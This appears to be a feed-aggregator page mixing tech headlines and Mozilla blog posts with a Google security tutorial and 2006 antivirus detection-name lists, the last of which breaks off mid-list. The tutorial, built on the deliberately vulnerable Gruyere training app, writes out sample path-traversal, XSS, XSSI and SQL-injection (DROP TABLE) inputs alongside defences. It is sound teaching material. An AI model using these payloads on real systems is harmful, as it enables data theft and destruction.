Wed 01 January, 2025

Channel Image14:56 iPhone 5 rumor rollup for the week ending March 23» Network World NetFlash
iPhone 5 rumors are taking on new ambitions: the phone that can bankrupt Sprint, for example.
Channel Image14:56 Windows 8 update: Dell thinks it can sell Windows 8 tablets» Network World NetFlash
Dell thinks it can make a buck off Windows 8 tablets, despite the fact that it pretty much abandoned its Android tablets last year.
Channel Image14:56 Why Magicians Are a Scientist's Best Friend» Wired Top Stories
A magician will instantly see the truth behind any colleague's illusion. But we have a bit of an advantage: We know we are being fooled. Scientists are instinctive doubters who employ a rigorous method to zero in on the truth, but they aren?t necessarily trained to expect deception by subjects and collaborators. We can't make magicians out of scientists ? we wouldn't want to ? but we can help scientists "think in the groove" ? think like a magician. And we should.


Channel Image14:56 Why Google is 'right to be paranoid'» Network World NetFlash
Google is still master of the search domain, but that hasn't stopped the company from looking over its shoulder.
Channel Image14:56 Why Black (or Blue, or Red) Plants Might Be the Key to Finding Life Beyond Earth» Wired Top Stories
Although Earth is a brilliant blue-and-green orb, habitable planets around other stars may harbor plants in wilder color ranges. Astrobiologist and Extremo Files blogger Jeffrey Marlow explains why.


Channel Image14:56 What IT managers say to get the CIO's OK» Network World NetFlash
When data center and facility managers meet with the CIO about new equipment, the conversations are rarely easy. The equipment they seek is often expensive, in the six- or seven-figure range, and justifying the expense can be challenging.
Channel Image14:56 What Does Winning Look Like?» Hacking for Christ
I've been thinking: what would the world look like if Mozilla won? Perhaps something like this: Users at home, at work and on the move are using their choice from a number of available operating systems on a variety of hardware and, on top of them, a number of web renderers, according to their preference. All of these stacks have good support for modern web standards. It's possible and commonplace to write a web application which runs pretty much everywhere. Web apps have most or all of the capabilities of native apps. No one company has control of the web or the standards - standards are collaboratively developed using an open process. Users have one or many online identities, real or pseudonymous, and associated profile data, which they own and control independent of any company or organization, and which cannot be taken away from them. Every site supports that identity mechanism for interacting with it, and users can take their data easily between systems. I think this vision of winning is widely shared across the Mozilla project. Most of us would like everything above (and a pony too :-)). I suggest that any differences of opinion regarding our future strategy are not about what winning looks like, but about how we get there, and avoid losing. So, if that's what winning looks like, what does losing look like? Clearly, if you invert all of the above, with closed systems, no choice, lagging and incompatible HTML engines, single vendor control of identity and so on, that's clearly a loss. But I doubt it'll be that clear cut. If we 'win' on some points and lose on others, how do we decide whether we've won or lost? Here's one plausible future scenario which looks to me a lot like being on the way to losing: There are a variety of platforms and operating systems, but control of the single web renderer on each platform belongs exclusively to each platform vendor. On minor platforms with less clout they see the value of the web as a competitive mechanism (few people write apps specifically for those OSes), but on the major platforms, vendors prefer people to buy (monetizable) apps through the platform store. Standards are collaboratively developed, but no-one can force vendors to implement them. So, as vendors innovate in their native app APIs instead, the capabilities of native apps and web apps on...
Channel Image14:56 Website Security for Webmasters» Google Online Security Blog


(Cross-posted from the Webmaster Central Blog)

Users are taught to protect themselves from malicious programs by installing sophisticated antivirus software, but they often also entrust their private information to various websites. As a result, webmasters have a dual task to protect both their website itself and the user data that they receive.

Over the years companies and webmasters have learned—often the hard way—that web application security is not a joke; we’ve seen user passwords leaked due to SQL injection attacks, cookies stolen with XSS, and websites taken over by hackers due to negligent input validation.

Today we’ll show you some examples of how a web application can be exploited so you can learn from them; for this we’ll use Gruyere, an intentionally vulnerable application we use for security training internally, and that we introduced here last year. Do not probe others’ websites for vulnerabilities without permission as it may be perceived as hacking; but you’re welcome—nay, encouraged—to run tests on Gruyere.


Client state manipulation - What will happen if I alter the URL?

Let’s say you have an image hosting site and you’re using a PHP script to display the images users have uploaded:

http://www.example.com/showimage.php?imgloc=/garyillyes/kitten.jpg

So what will the application do if I alter the URL to something like this and userpasswords.txt is an actual file?

http://www.example.com/showimage.php?imgloc=/../../userpasswords.txt

Will I get the content of userpasswords.txt?

Another example of client state manipulation is when form fields are not validated. For instance, let’s say you have this form:



It seems that the username of the submitter is stored in a hidden input field. Well, that’s great! Does that mean that if I change the value of that field to another username, I can submit the form as that user? It may very well happen; the user input is apparently not authenticated with, for example, a token which can be verified on the server.
Imagine the situation if that form were part of your shopping cart and I modified the price of a $1000 item to $1, and then placed the order.

Protecting your application against this kind of attack is not easy; take a look at the third part of Gruyere to learn a few tips about how to defend your app.

Cross-site scripting (XSS) - User input can’t be trusted



A simple, harmless URL:
http://google-gruyere.appspot.com/611788451095/%3Cscript%3Ealert('0wn3d')%3C/script%3E
But is it truly harmless? If I decode the percent-encoded characters, I get:
<script>alert('0wn3d')</script>

Gruyere, just like many sites with custom error pages, is designed to include the path component in the HTML page. This can introduce security bugs, like XSS, as it introduces user input directly into the rendered HTML page of the web application. You might say, “It’s just an alert box, so what?” The thing is, if I can inject an alert box, I can most likely inject something else, too, and maybe steal your cookies which I could use to sign in to your site as you.

Another example is when the stored user input isn’t sanitized. Let’s say I write a comment on your blog; the comment is simple:
<a href=”javascript:alert(‘0wn3d’)”>Click here to see a kitten</a>

If other users click on my innocent link, I have their cookies:



You can learn how to find XSS vulnerabilities in your own web app and how to fix them in the second part of Gruyere; or, if you’re an advanced developer, take a look at the automatic escaping features in template systems we blogged about previously on this blog.

Cross-site request forgery (XSRF) - Should I trust requests from evil.com?

Oops, a broken picture. It can’t be dangerous--it’s broken, after all--which means that the URL of the image returns a 404 or it’s just malformed. Is that true in all of the cases?

No, it’s not! You can specify any URL as an image source, regardless of its content type. It can be an HTML page, a JavaScript file, or some other potentially malicious resource. In this case the image source was a simple page’s URL:



That page will only work if I’m logged in and I have some cookies set. Since I was actually logged in to the application, when the browser tried to fetch the image by accessing the image source URL, it also deleted my first snippet. This doesn’t sound particularly dangerous, but if I’m a bit familiar with the app, I could also invoke a URL which deletes a user’s profile or lets admins grant permissions for other users.

To protect your app against XSRF you should not allow state changing actions to be called via GET; the POST method was invented for this kind of state-changing request. This change alone may have mitigated the above attack, but usually it's not enough and you need to include an unpredictable value in all state changing requests to prevent XSRF. Please head to Gruyere if you want to learn more about XSRF.

Cross-site script inclusion (XSSI) - All your script are belong to us

Many sites today can dynamically update a page's content via asynchronous JavaScript requests that return JSON data. Sometimes, JSON can contain sensitive data, and if the correct precautions are not in place, it may be possible for an attacker to steal this sensitive information.

Let’s imagine the following scenario: I have created a standard HTML page and send you the link; since you trust me, you visit the link I sent you. The page contains only a few lines:
<script>function _feed(s) {alert("Your private snippet is: " + s['private_snippet']);}</script><script src="http://google-gruyere.appspot.com/611788451095/feed.gtl"></script>

Since you’re signed in to Gruyere and you have a private snippet, you’ll see an alert box on my page informing you about the contents of your snippet. As always, if I managed to fire up an alert box, I can do whatever else I want; in this case it was a simple snippet, but it could have been your biggest secret, too.

It’s not too hard to defend your app against XSSI, but it still requires careful thinking. You can use tokens as explained in the XSRF section, set your script to answer only POST requests, or simply start the JSON response with ‘\n’ to make sure the script is not executable.

SQL Injection - Still think user input is safe?

What will happen if I try to sign in to your app with a username like
JohnDoe’; DROP TABLE members;--

While this specific example won’t expose user data, it can cause great headaches because it has the potential to completely remove the SQL table where your app stores information about members.

Generally, you can protect your app from SQL injection with proactive thinking and input validation. First, are you sure the SQL user needs to have permission to execute “DROP TABLE members”? Wouldn’t it be enough to grant only SELECT rights? By setting the SQL user’s permissions carefully, you can avoid painful experiences and lots of troubles. You might also want to configure error reporting in such way that the database and its tables’ names aren’t exposed in the case of a failed query.
Second, as we learned in the XSS case, never trust user input: what looks like a login form to you, looks like a potential doorway to an attacker. Always sanitize and quotesafe the input that will be stored in a database, and whenever possible make use of statements generally referred to as prepared or parametrized statements available in most database programming interfaces.

Knowing how web applications can be exploited is the first step in understanding how to defend them. In light of this, we encourage you to take the Gruyere course, take other web security courses from the Google Code University and check out skipfish if you're looking for an automated web application security testing tool. If you have more questions please post them in our Webmaster Help Forum.
Channel Image14:56 We Fight For the User» Hacking for Christ
My last blog post looked at what winning (and losing) might look like. So now we ask: how do we win? Answer: like this (audio version). Key points and aspirations from Brendan's talk: Open web apps - cross-platform and cross-renderer Multiple competing app stores Distribution deals for Firefox on Android Boot to Gecko (a complete OS stack) Firefox Home everywhere Not rewriting Firefox on top of WebKit High-quality Firefox on iOS (either in the store or not) Focus on ARM performance Firefox on Windows Phone 7 as a native app Fixing lock-in wherever we go Game on! :-)...
Channel Image14:56 Watch Live: Mountaintop Blast Makes Way for Giant Telescope» Wired Top Stories
Watch as engineers take the first step in constructing the Giant Magellan Telescope by blowing up the top of Cerro Las Campanas, a mountain in Chile.


Channel Image14:56 Vuln: Net-SNMP Fixproc Insecure Temporary File Creation Vulnerability» recent infosec news
Net-SNMP Fixproc Insecure Temporary File Creation Vulnerability
Channel Image14:56 Virus Updates for May 9th, 2006» Virus Tracker
DAT Version:4758
DAT Release Date:5-9-2006
Threats Detected:189,357
New Detections:14
Enhanced Detections:83



Enhanced detections are those that have been modified for this release. Detections are enhanced to cover new variants, optimize performance, and correct incorrect identifications.

Noteworthy threats are those that had an AVERT risk assessment of Low-Profiled, Medium, Medium-On-Watch, High, or High-Outbreak at the time of DAT release.

Noteworthy Threats:

NameCorporate Risk AssessmentHome Risk Assessment
X97F/Yagnuul.gen

Low-Profiled

Low-Profiled

Full list

New DetectionsEnhanced detections
Program (1)
Win32 (1)
Settec
Trojan (9)
Downloader (2)
Downloader-AWD
Downloader-AWC
Dropper (1)
BackDoor-CZR.dr
Exploit (1)
Exploit-SWF.b!demo
Heuristic (1)
New Malware.ak!zip
ProcKill (1)
ProcKill-DR
Remote Access (1)
BackDoor-CZR
Win32 (2)
Uploader-AF
Modelo
Virus (4)
(1)
SymbOS/Skulls.ce!sis
Email (1)
W32/Fenet.a@MM
Generic Worm (1)
W32/Sdbot.worm.gen.cb
Macro (1)
X97F/Yagnuul.gen

Program (2)
Adware (1)
Adware-SearchAid
Win32 (1)
Generic HTool.b
Trojan (65)
(5)
Generic BackDoor.bb
Generic Proxy.h
Phish-BankFraud.eml.d
Generic.f
Generic.cd
Application extension (5)
BackDoor-BAC.dll
Puper.dll
Spam-Loot.dll
PWS-WoW.dll
PWS-Lineage.dll
Downloader (6)
Downloader-XC
PWS-Banker.dldr
Downloader-ZQ
PWS-Banker.dldr.c
Downloader-ATP
Downloader-ASH
Dropper (1)
MultiDropper-NB
Exploit (1)
Exploit-ObscuredHtml
Generic (4)
Oleloa.gen
BackDoor-BAC.gen
PWS-Banker.gen.t
Exploit-MS06-012.gen
Heuristic (3)
New Malware.n
New Malware.j
New Malware.ab
Password (2)
PWS-LegMir
PWS-LDPinch
Password Stealer (8)
PWS-Banker.ad
Generic PWS.g
PWS-Banker.gen.ba
PWS-Banker.gen.i
PWS-Banker.gen.h
W32/Loosky!pws
PWS-WoW
PWS-Lineage
Proxy (2)
Proxy-Agent.au
Proxy-Horst
Remote Access (7)
BackDoor-ARR
BackDoor-AWQ.b
BackDoor-CZP
BackDoor-CPY
BackDoor-CXI
BackDoor-CMQ
BackDoor-CYY
Spam (1)
Spam-Loot
Win32 (20)
Generic Delphi
DollarRevenue
AdClicker-EG
Ezoons
Generic Downloader.d
Generic FDoS.d
Generic Downloader.bj
Puper
Generic Downloader.s
Generic Delphi.c
Generic Proxy.d
Generic Downloader.u
Generic Downloader.y
Generic PWS.o
Generic QLowZones.a
Generic BackDoor.u
Generic Downloader.ab
Generic AdClicker.p
Generic Proxy.e
Generic Downloader.g
Virus (16)
Application extension (1)
W32/Loosky.dll
Downloader (1)
W32/Loosky.dldr
Dropper (1)
W32/Loosky.dr
Email (1)
W32/Loosky.e@MM
Email Generic (2)
W32/Loosky.gen@mm
W32/Feebs.gen@MM
Generic (1)
W32/Loosky.gen
Generic Worm (3)
W32/Sdbot.worm.gen.h
W32/Sdbot.worm.gen.ae
W32/Sdbot.worm.gen.bz
Win32 (4)
New Win32
W32/Feebs!rootkit
W32/Loosky!proxy
W32/Loosky!backdoor
Worm (2)
W32/MoonLight.worm
W32/Gavir.worm
Channel Image14:56 Virus Updates for May 8th, 2006» Virus Tracker
DAT Version:4757
DAT Release Date:5-8-2006
Threats Detected:18,9236
New Detections:21
Enhanced Detections:260



Enhanced detections are those that have been modified for this release. Detections are enhanced to cover new variants, optimize performance, and correct incorrect identifications.

Full list

New DetectionsEnhanced detections
Program (2)
  Win32 (2)
    VegasredCas
    RemAdm-ProcLaunch!171
Trojan (10)
  Demonstration (1)
    Exploit-NestedObj.demo
  Downloader (4)
    Downloader-AWB
    Downloader-AWA
    Downloader-AVZ
    Downloader-QO!mem
  Exploit (1)
    Exploit-NestedObj
  Keylogger (1)
    Keylog-Nofear
  Remote Access (1)
    BackDoor-CZQ
  Script (1)
    Bat/avk81
  Win32 (1)
    Del-503
Virus (9)
  Damaged (1)
    W32/Maya.dam
  Email (1)
    W32/Rabit@MM
  Worm (7)
    W32/Tahun.worm
    W32/RDevil.worm
    W32/MoonLight.worm
    W32/Loveme.worm
    W32/Bropia.worm.dd
    W32/Bropia.worm.dc
    W32/Liz.worm
Internet Worm (2)
  E-mail (2)
    W32/Kidala.b@MM
    W32/Kidala.a@MM
Program (11)
   (1)
    Generic PUP.a
  Adware (1)
    Adware-NaviPromo
  Dialer (1)
    Dialer-Generic.f
  Dropper (1)
    Spyware-SpyMyPC.dr
  Joke (1)
    Joke-LOL
  Keylogger (1)
    Keylog-MetaCodix
  Malware Tool (2)
    VTool/fake
    VTool/fakez
  Spyware (1)
    Spyware-SpyMyPC
  Win32 (2)
    Generic HTool.bb
    Winfixer
Trojan (88)
   (5)
    Generic Dropper.o
    Generic Downloader.o
    Generic BackDoor.bb
    Generic Proxy.h
    Painter
  - (1)
    Spam-Mailbot
  Application extension (4)
    BackDoor-AWQ.dll
    BackDoor-BAC.dll
    Puper.dll
    PWS-Goldun.dll
  Configurator (1)
    BackDoor-CEP.cfg
  Downloader (9)
    BackDoor-CMQ.dldr
    Downloader-ABB
    PWS-Banker.dldr
    Downloader-ABU
    Downloader-AVS
    Downloader-ZQ
    PWS-Banker.dldr.c
    Downloader-ARH
    Downloader-QO
  Dropper (7)
    PWS-LDPinch.dr
    BackDoor-AWQ.dr
    PWS-Hooker.dr
    Zquest.dr
    BackDoor-CEP.dr
    Puper.dr
    BackDoor-COC.dr
  Dropper Generic (1)
    AdClicker-C.gen.dr
  Exploit (2)
    JS/Exploit-DDay
    Exploit-ObscuredHtml
  Generic (5)
    Swizzor.gen
    PWS-Banker.gen.g
    PWS-Banker.gen.t
    BackDoor-CKB.sys.gen
    BackDoor-BAC.gen.b
  Generic Worm (1)
    W32/Sdbot.worm.gen.ax
  Heuristic (2)
    New Malware.f
    New Malware.ae
  Keylogger (1)
    Keylog-Logit
  Malware Tool (3)
    Spam-GWab
    NTRootKit-U
    Spam-DComServ
  Password (1)
    PWS-LDPinch
  Password Stealer (11)
    PWS-QQRob
    PWS-JA
    PWS-AOLPhish
    PWS-Banker.gen.ba
    PWS-RXJH
    PWS-Banker.gen.i
    PWS-Banker.gen.h
    PWS-Goldun.sys
    W32/Loosky!pws
    PWS-Banker.au
    PWS-Lineage
  Plugin component (1)
    BackDoor-JX.plugin
  ProcKill (1)
    ProcKill-DA
  Proxy (2)
    Proxy-FBSR
    Proxy-Raser
  Remote Access (9)
    BackDoor-AWQ.b
    BackDoor-AWQ
    BackDoor-ALD
    BackDoor-BAC.gen.d
    BackDoor-BAC.sys
    BackDoor-CMQ
    BackDoor-CES
    BackDoor-CKB
    BackDoor-CEP
  Script (1)
    IIS/BackDoor-ACE
  Server (1)
    BackDoor-CUR.svr
  StartPage (2)
    StartPage-HR
    StartPage-IW
  Win32 (17)
    DollarRevenue
    Systhread
    Generic BackDoor.c
    Puper
    Generic Downloader.s
    Generic Downloader.k
    Generic Dropper.p
    Swizzor
    Generic AdClicker.j
    Generic Downloader.aa
    Regger
    Zquest
    Generic Dropper.i
    Generic BackDoor.u
    Generic Downloader.ab
    Generic BackDoor.j
    Galapoper
Virus (159)
   (1)
    Oxfall.865
  Application extension (1)
    W32/Loosky.dll
  Boot (1)
    Dodgy
  Damaged (1)
    W32/Mytob.dam
  Downloader (1)
    W32/Loosky.dldr
  Dropper (1)
    W32/Loosky.dr
  Dropper Worm (1)
    W32/Kelvir.worm.dr
  E-mail (1)
    W32/Mytob.gr@MM
  Email (72)
    W32/Mytob.ao@MM
    W32/Mytob.al@MM
    W32/Mytob.ew@MM
    W32/Mytob.fa@MM
    W32/Mytob.ft@MM
    W32/Mytob.fs@MM
    W32/Mytob.aw@MM
    W32/Mytob.fr@MM
    W32/Mytob.ba@MM
    W32/Mytob.bc@MM
    W32/Mytob.bb@MM
    W32/Mytob.bd@MM
    W32/Mytob.id@MM
    W32/Mytob.fu@MM
    W32/Mytob.fw@MM
    W32/Mytob.fv@MM
    W32/Mytob.ge@MM
    W32/Mytob.go@MM
    W32/Mytob.bu@MM
    W32/Mytob.bq@MM
    W32/Mytob.by@MM
    W32/Mytob.cq@MM
    W32/Mytob.ck@MM
    W32/Mytob.fz@MM
    W32/Mytob.gf@MM
    W32/Mytob.gn@MM
    W32/Mytob.gp@MM
    W32/Mytob.cw@MM
    W32/Mytob.p@MM
    W32/Mytob.i@MM
    W32/Mytob.k@MM
    W32/Mytob.r@MM
    W32/Mytob.gm@MM
    W32/Mytob.gs@MM
    W32/Mytob.m@MM
    W32/Mytob.bs@MM
    W32/Mytob.de@MM
    W32/Mytob.cb@MM
    W32/Mytob.do@MM
    W32/Mytob.dl@MM
    W32/Mytob.h@MM
    W32/Mytob.j@MM
    W32/Mytob.l@MM
    W32/Mytob.o@MM
    W32/Mytob.t@MM
    W32/Mytob.x@MM
    W32/Mytob.y@MM
    W32/Mytob.cr@MM
    W32/Mytob.cl@MM
    W32/Mytob.ci@MM
    W32/Mytob.cx@MM
    W32/Mytob.cy@MM
    W32/Mytob.dn@MM
    W32/Mytob.ei@MM
    W32/Mytob.aa@MM
    W32/Mytob.ad@MM
    W32/Mytob.dw@MM
    W32/Mytob.dv@MM
    W32/Mytob.du@MM
    W32/Mytob.aj@MM
    W32/Mytob.z@MM
    W32/Mytob.hq@MM
    W32/Mytob.eg@MM
    W32/Mytob.ho@MM
    W32/Mytob.hn@MM
    W32/Mytob.hk@MM
    W32/Mytob.hm@MM
    W32/Mytob.hj@MM
    W32/Loosky.e@MM
    W32/Mytob.ha@MM
    W32/Mytob.em@MM
    W32/Mytob.en@MM
  Email Generic (3)
    W32/Mytob.gen@MM
    W32/Loosky.gen@mm
    W32/Feebs.gen@MM
  Generic (2)
    W32/Loosky.gen
    W32/Nopir.gen
  Generic Worm (4)
    W32/Sdbot.worm.gen.h
    W32/Kelvir.worm.gen
    W32/Sdbot.worm.gen.bh
    W32/Sdbot.worm.gen.ac
  Internet Worm (3)
    W32/Kelvir.worm.bh
    W32/Kelvir.worm.f
    W32/Bropia.worm.aj
  mIRC Worm (1)
    MIRC/Generic
  P2P Worm (1)
    W32/Bactera.worm!p2p
  Peer To Peer Worm (1)
    W32/Steam.worm!p2p
  Script Worm (1)
    W32/Crumpet.worm.bat
  Win32 (3)
    W32/Feebs!rootkit
    W32/Loosky!proxy
    W32/Loosky!backdoor
  Worm (60)
    W32/Kelvir.worm.eo
    W32/Kelvir.worm.ex
    W32/Kelvir.worm.al
    W32/Kelvir.worm.ap
    W32/Kelvir.worm.an
    W32/Bropia.worm.al
    W32/Bropia.worm.ak
    W32/Kelvir.worm.ao
    W32/Kelvir.worm.am
    W32/Bropia.worm.am
    W32/Kelvir.worm.ec
    W32/Kelvir.worm.ax
    W32/Bropia.worm.ao
    W32/Bropia.worm.an
    W32/Kelvir.worm.az
    W32/Kelvir.worm.ba
    W32/Kelvir.worm.ay
    W32/Bropia.worm.ar
    W32/Kelvir.worm.bg
    W32/Kelvir.worm.e
    W32/Bropia.worm.ba
    W32/Bropia.worm.az
    W32/Bropia.worm.ay
    W32/Bropia.worm.ax
    W32/Bropia.worm.bb
    W32/Crumpet.worm
    W32/Kelvir.worm.ca
    W32/Bropia.worm.bd
    W32/Kelvir.worm.ci
    W32/Kelvir.worm.i
    W32/Bropia.worm
    W32/Kelvir.worm.o
    W32/Kelvir.worm.p
    W32/Kelvir.worm.l
    W32/Kelvir.worm.ch
    W32/Bropia.worm.be
    W32/Bropia.worm.bg
    W32/Kelvir.worm.q
    W32/Kelvir.worm.w
    W32/Bropia.worm.bh
    W32/Kelvir.worm.cu
    W32/Kelvir.worm.da
    W32/Kelvir.worm.cz
    W32/Kelvir.worm.dd
    W32/Kelvir.worm.cq
    W32/Kelvir.worm.cv
    W32/Kelvir.worm.cx
    W32/Kelvir.worm.cy
    W32/Bropia.worm.ag
    W32/Kelvir.worm.ac
    W32/Kelvir.worm.aj
    W32/Kelvir.worm.ai
    W32/Bropia.worm.ah
    W32/Bropia.worm.ai
    W32/Kelvir.worm.db
    W32/Kelvir.worm.gc
    W32/Bropia.worm.bz
    W32/Bropia.worm.br
    W32/Kelvir.worm.dy
    W32/Bropia.worm.bs
Channel Image14:56 Virus Updates for May 5th, 2006» Virus Tracker
DAT Version:4756
DAT Release Date:5-5-2006
Threats Detected:189,044
New Detections:0
Enhanced Detections:17



Enhanced detections are those that have been modified for this release. Detections are enhanced to cover new variants, optimize performance, and correct incorrect identifications.

Full list

New DetectionsEnhanced detections
None :D
Trojan (7)
Downloader (1)
Downloader-QO
Generic Worm (1)
W32/Sdbot.worm.gen.ax
Heuristic (5)
New Malware.j
New Malware.aj
New Malware.ah
New Malware.ab
New Malware.y
Virus (10)
Damaged Worm (1)
W32/Gaobot.worm.dam
Email Generic (1)
W32/Feebs.gen@MM
Floppy (1)
W32/Generic!floppy
Generic Worm (2)
W32/Gaobot.worm.gen.e
W32/Sdbot.worm.gen.h
Internet Worm (1)
New Worm
Win32 (4)
W32/Generic.d
W32/Generic!msn
W32/Generic!im
W32/Feebs!rootkit
Channel Image14:56 Virus Updates for May 26th, 2006» Virus Tracker
DAT Version:4771
DAT Release Date:5-26-2006
Threats Detected:192,871
New Detections:6
Enhanced Detections:145



Enhanced detections are those that have been modified for this release. Detections are enhanced to cover new variants, optimize performance, and correct incorrect identifications.

Full list

New DetectionsEnhanced detections
Program (1)
  Dropper (1)
    Emando.dr
Trojan (2)
  Downloader (1)
    Downloader-AWP
  Win32 (1)
    Spy-Agent.az
Virus (3)
  E-mail (2)
    W32/Mytob.ih@MM
    W32/Mytob.ii@MM
  Win32 (1)
    W32/Sality.u
Internet Worm (1)
  Win32 (1)
    W32/Browaf.worm
Malware (1)
  Win32 (1)
    Exploit-Mydoom
Program (4)
   (1)
    VText.3c
  Keylogger (1)
    Keylog-CN
  Malware Tool (1)
    VTool/fake
  Win32 (1)
    ServU-Daemon
Trojan (44)
   (3)
    Generic BackDoor.bb
    Generic Downloader.ao
    Generic Proxy.h
  Application extension (2)
    PWS-Legmir.dll
    StartPage-DH.dll
  Configurator (1)
    BackDoor-CEP.cfg
  Demonstration (1)
    JS/Exploit-DragDrop.b.demo
  Downloader (5)
    PWS-Banker.dldr
    Downloader-ZQ
    Downloader-ASH
    Downloader-ACR
    Downloader-AWM
  Dropper (3)
    BackDoor-CKB.dr
    BackDoor-CEP.dr
    Spam-DComServ.dr
  Exploit (2)
    Exploit-DcomRpc
    Exploit-MS04-011
  Generic (5)
    Exploit-OleData.gen
    PWS-Banker.gen.bb
    BackDoor-CKB.gen
    Exploit-MS06-004.gen
    JS/Exploit-DragDrop.b.gen
  Generic Worm (1)
    W32/Sdbot.worm.gen.ax
  HTML (1)
    JS/Winbomb
  Password Stealer (5)
    PWS-Banker.gen.i
    PWS-Banker.gen.h
    PWS-Goldun.sys
    PWS-Banker.bh
    PWS-Banker.au
  Proxy (1)
    Proxy-Agent.a
  Remote Access (5)
    BackDoor-AMQ
    BackDoor-AWQ.b
    BackDoor-CKB.sys
    BackDoor-CMQ
    BackDoor-CEP
  StartPage (1)
    StartPage-DH
  Win32 (8)
    Generic Downloader.a
    Puper
    Generic Downloader.bb
    Generic BackDoor.bc
    Swizzor
    Generic PWS.o
    Generic BackDoor.u
    Generic Downloader.ab
Virus (95)
  Damaged (1)
    W32/Mytob.dam
  Damaged Worm (1)
    W32/Sdbot.worm.dam
  E-mail (3)
    W32/Mytob.ig@MM
    W32/Mytob.gr@MM
    W32/Banwarum.dll
  Email (72)
    W32/Mytob.ao@MM
    W32/Mytob.al@MM
    W32/Mytob.ew@MM
    W32/Mytob.ie@MM
    W32/Mytob.fa@MM
    W32/Mytob.ft@MM
    W32/Mytob.fs@MM
    W32/Mytob.aw@MM
    W32/Mytob.fr@MM
    W32/Mytob.ba@MM
    W32/Mytob.bc@MM
    W32/Mytob.bb@MM
    W32/Mytob.bd@MM
    W32/Mytob.id@MM
    W32/Mytob.fu@MM
    W32/Mytob.fw@MM
    W32/Mytob.fv@MM
    W32/Mytob.ge@MM
    W32/Mytob.go@MM
    W32/Mytob.bu@MM
    W32/Mytob.bq@MM
    W32/Mytob.by@MM
    W32/Mytob.cq@MM
    W32/Mytob.ck@MM
    W32/Mytob.fz@MM
    W32/Mytob.gf@MM
    W32/Mytob.gn@MM
    W32/Mytob.gp@MM
    W32/Mytob.cw@MM
    W32/Mytob.p@MM
    W32/Mytob.i@MM
    W32/Mytob.k@MM
    W32/Mytob.r@MM
    W32/Mytob.gm@MM
    W32/Mytob.gs@MM
    W32/Mytob.m@MM
    W32/Mytob.bs@MM
    W32/Mytob.de@MM
    W32/Mytob.cb@MM
    W32/Mytob.do@MM
    W32/Mytob.dl@MM
    W32/Mytob.h@MM
    W32/Mytob.j@MM
    W32/Mytob.l@MM
    W32/Mytob.o@MM
    W32/Mytob.t@MM
    W32/Mytob.x@MM
    W32/Mytob.y@MM
    W32/Mytob.cr@MM
    W32/Mytob.cl@MM
    W32/Mytob.ci@MM
    W32/Mytob.cx@MM
    W32/Mytob.cy@MM
    W32/Mytob.dn@MM
    W32/Mytob.ei@MM
    W32/Mytob.aa@MM
    W32/Mytob.ad@MM
    W32/Mytob.dw@MM
    W32/Mytob.dv@MM
    W32/Mytob.du@MM
    W32/Mytob.aj@MM
    W32/Mytob.z@MM
    W32/Mytob.hq@MM
    W32/Mytob.eg@MM
    W32/Mytob.ho@MM
    W32/Mytob.hn@MM
    W32/Mytob.hk@MM
    W32/Mytob.hm@MM
    W32/Mytob.hj@MM
    W32/Mytob.ha@MM
    W32/Mytob.em@MM
    W32/Mytob.en@MM
  Email Generic (1)
    W32/Mytob.gen@MM
  Exploit (1)
    Exploit-MS04-11
  Generic Worm (10)
    W32/IRCbot.worm.gen
    W32/Spybot.worm.gen.bx
    W32/Opanki.worm.gen
    W32/Sdbot.worm.gen.l
    W32/Sdbot.worm.gen.h
    W32/Sdbot.worm.gen.bk
    W32/Sdbot.worm.gen.ai
    W32/Sdbot.worm.gen.bh
    W32/Sdbot.worm.gen.by
    W32/Sdbot.worm.gen.ac
  Win32 (4)
    New Poly Win32
    W32/Sality.r
    W32/Sality.t
    W32/Sality.s
  Worm (2)
    W32/MoonLight.worm
    W32/Opanki.worm
Channel Image14:56 Virus Updates for May 25th, 2006» Virus Tracker
DAT Version:4770
DAT Release Date:5-25-2006
Threats Detected:192,769
New Detections:15
Enhanced Detections:147



Enhanced detections are those that have been modified for this release. Detections are enhanced to cover new variants, optimize performance, and correct incorrect identifications.

Full list

New DetectionsEnhanced detections
Internet Worm (1)
  Win32 (1)
    W32/Browaf.worm
Trojan (11)
  Application extension (1)
    BackDoor-CZZ.dll
  Downloader (2)
    W97M/Downloader-AWO
    Downloader-AWN
  Dropper (2)
    BackDoor-CVT.dr
    MultiDropper-QR
  ProcKill (1)
    ProcKill-DS
  Proxy (1)
    Proxy-Agent.aw
  Remote Access (3)
    BackDoor-DAA
    BackDoor-CZZ
    BackDoor-CZY
  Win32 (1)
    APStrojan.ub
Virus (3)
  E-mail (2)
    W32/Banwarum@MM
    W32/Banwarum.dll
  Win32 (1)
    W32/Madangel.a
Program (4)
  Adware (2)
    Adware-PigSearch
    Adware-Newweb
  Spyware (2)
    Spyware-SpyAgent
    Spyware-Realtime-Spy
Trojan (59)
   (1)
    Generic BackDoor.d
  Application extension (4)
    Downloader-AUE.dll
    PWS-Goldun.dll
    PWS-Banker.ar.dll
    PWS-Banker.dll
  Configurator (2)
    PWS-QQPass.cfg
    BackDoor-CEP.cfg
  Downloader (8)
    Downloader-AFW
    PWS-Banker.dldr
    Downloader-ATM!CME-934
    Downloader-ATM!CME-503
    Downloader-ZQ
    Downloader-ATM
    Downloader-ASH
    Downloader-AWM
  Dropper (4)
    BackDoor-CEP.dr
    Puper.dr
    MultiDropper-MY
    Spam-DComServ.dr
  Exploit (4)
    Exploit-CodeBase.chm
    Exploit-WMF.b
    Exploit-WMF.c
    Exploit-WMF
  Generic (3)
    Exploit-OleData.gen
    APSTrojan.ua.gen
    PWS-Banker.gen.ab
  Heuristic (2)
    New Malware.u
    New Malware.j
  Password (1)
    PWS-QQPass
  Password Stealer (7)
    Generic PWS.e
    PWS-Banker.gen.i
    PWS-Banker.gen.h
    PWS-Banker.bh
    PWS-Banker.au
    PWS-WoW
    PWS-Lineage
  Proxy (2)
    Proxy-Agent.a
    Proxy-Piky
  Remote Access (7)
    BackDoor-AWQ.b
    BackDoor-CCT
    BackDoor-CKB.sys
    Generic BackDoor.l
    BackDoor-CMQ
    BackDoor-CYY
    BackDoor-CEP
  Script (1)
    Generic Downloader.z
  StartPage (1)
    StartPage-ID
  Win32 (12)
    DollarRevenue
    Generic Uploader.a
    Puper
    Generic Downloader.af
    APSTrojan.ua
    Generic Downloader.k
    Generic Downloader.u
    Generic Dropper.ad
    Swizzor
    Generic BackDoor.u
    AdClicker-DW
    Generic AdClicker.d
Virus (84)
  Damaged (1)
    W32/Mytob.dam
  E-mail (1)
    W32/Mytob.gr@MM
  Email (72)
    W32/Mytob.ao@MM
    W32/Mytob.al@MM
    W32/Mytob.ew@MM
    W32/Mytob.ie@MM
